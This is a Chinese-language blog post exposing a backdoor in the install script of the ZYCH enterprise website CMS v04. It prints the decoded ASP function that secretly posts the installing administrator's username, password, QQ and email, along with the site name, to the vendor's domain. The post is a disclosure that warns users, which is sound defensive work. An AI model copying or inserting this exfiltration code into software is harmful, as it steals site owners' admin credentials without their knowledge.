首页
Loading
您所在的位置:首页 > 代码研究 > 正文

解密ZYCH自由策划企业网站管理系统安装文件Install.ASP后门 包括01-04

作者: 来源: 日期:2016-1-2 17:34:39 人气:128 加入收藏 评论:0 标签:企业网站 管理系统

程序:ZYCH自由策划企业网站管理系统 v04 版本更新时间:2015-12-2

今天下载了套源码,也是站长网下载的这几天更新的新的ASP源码,发现安装程序里有比较严重的漏洞。

文件地址:INCLUDE/Install.asp

第346行开始,358行结束,这一段是一个伪加密的向作者主页提交安装用户后台的帐号密码,这个很关键,如果只是提交是哪个网站安装了这个程序倒是无所谓,关键是管理员帐号密码信息也同时提交了,可谓作者居心不良。

通过解密工具可以将代码转换成

http="http://"
WdUrl="www.zychr.com"
Function Wfcx_GetBody(Wfcx_str)
Set https = Server.CreateObject("MSXML2.XMLHTTP") 
With https 
.Open "Post", ""&http&WdUrl&"/"&"Inc"&"lude/weburl"&"."&"asp"&"?"&"action=add", False
.setRequestHeader "Content-Type","application/x-www-form-urlencoded"
.Send "title="&Server.UrlEncode(""&wzbt&"")&"&weburl="&Request.servervariables("server_name")&"&version=ZYCH_"&zychversion&"&verdata="&data&"&authorization=Pay&admin="&request.form("admin")&"&password="&request.form("password")&"&qq="&request.form("qq")&"&mail="&request.form("mail")&""
Wfcx_GetBody = .ResponseBody
End With 
Wfcx_GetBody = BytesToBstr(Wfcx_GetBody,"GB2312")
Set https = Nothing 
End Function

所以,安装各种软件或者网站,必须保持清醒的头脑,尽量选择大公司的源码。


    本文网址:http://ikseo.com/daimayanjiu/6710.html
    读完这篇文章后,您心情如何?
    • 0
    • 0
    • 0
    • 0
    • 0
    • 0
    • 0
    • 0
    上一篇:没有资料
    更多>>网友评论
    发表评论